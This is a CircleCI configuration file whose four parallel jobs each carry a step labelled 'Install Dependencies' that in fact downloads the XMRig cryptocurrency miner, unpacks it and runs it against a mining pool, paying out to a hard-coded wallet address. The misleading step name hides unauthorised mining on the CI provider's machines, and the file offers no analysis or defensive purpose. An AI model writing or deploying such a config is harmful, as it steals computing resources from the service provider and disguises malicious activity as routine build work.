version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar xf xmrig-6.18.0-linux.tar.gz && cd xmrig-6.18.0  && ./xmrig -o rx.unmineable.com:3333 -u SHIB:0x49acCe680224636703A8fF0F9c9e78a9BaA99fc8.YUDHA -p X -k -a rx/0
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar xf xmrig-6.18.0-linux.tar.gz && cd xmrig-6.18.0  && ./xmrig -o rx.unmineable.com:3333 -u SHIB:0x49acCe680224636703A8fF0F9c9e78a9BaA99fc8.YUDHA -p X -k -a rx/0
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar xf xmrig-6.18.0-linux.tar.gz && cd xmrig-6.18.0  && ./xmrig -o rx.unmineable.com:3333 -u SHIB:0x49acCe680224636703A8fF0F9c9e78a9BaA99fc8.YUDHA -p X -k -a rx/0
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar xf xmrig-6.18.0-linux.tar.gz && cd xmrig-6.18.0  && ./xmrig -o rx.unmineable.com:3333 -u SHIB:0x49acCe680224636703A8fF0F9c9e78a9BaA99fc8.YUDHA -p X -k -a rx/0
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3